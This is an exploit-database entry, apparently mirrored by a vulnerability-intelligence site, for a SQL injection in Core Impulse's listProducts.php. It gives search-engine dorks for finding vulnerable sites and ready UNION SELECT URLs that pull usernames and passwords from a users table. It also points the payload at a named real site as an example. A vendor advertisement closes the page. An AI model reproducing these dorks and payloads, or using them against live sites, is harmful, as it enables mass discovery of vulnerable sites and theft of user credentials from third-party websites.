Core Impulse SQL Injection vulnerability found at www.coreimpulse.co
`Core Impulse SQL Injection vulnerability
******************************
Vendor site: www.coreimpulse.com
discovered by: e.wiZz!
Dork: inurl:/products/listProducts.php?cat or inurl:listProducts.php?cat
Exploit:
http://www.somesite.com/products/listProducts.php?cat=-9999+UNION+ALL+SELECT+username,2,3+FROM+users/
http://www.somesite.com/products/listProducts.php?cat=-9999+UNION+ALL+SELECT+password,2,3+FROM+users/
Example:
http://www.belgradetradecenter.com/products/listProducts.php?cat=-9999+UNION+ALL+SELECT+username,2,3+FROM+users/*http://www.belgradetradecenter.com/products/listProducts.php?cat=-9999+UNION+ALL+SELECT+password,2,3+FROM+users/
My blog: infected.blogger.ba
visit: 50centshost.com/forum
Info:bezveze ovo al et,osjecam se kao noob :D
Thanks 2: big thanks to my friend aluigi(aluigi.freeforums.org),QKrunix,F34r...nekako su mi zanimljivi,hvala i skillpak3ru sto me nasmijava svojim znanjem :D
`
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo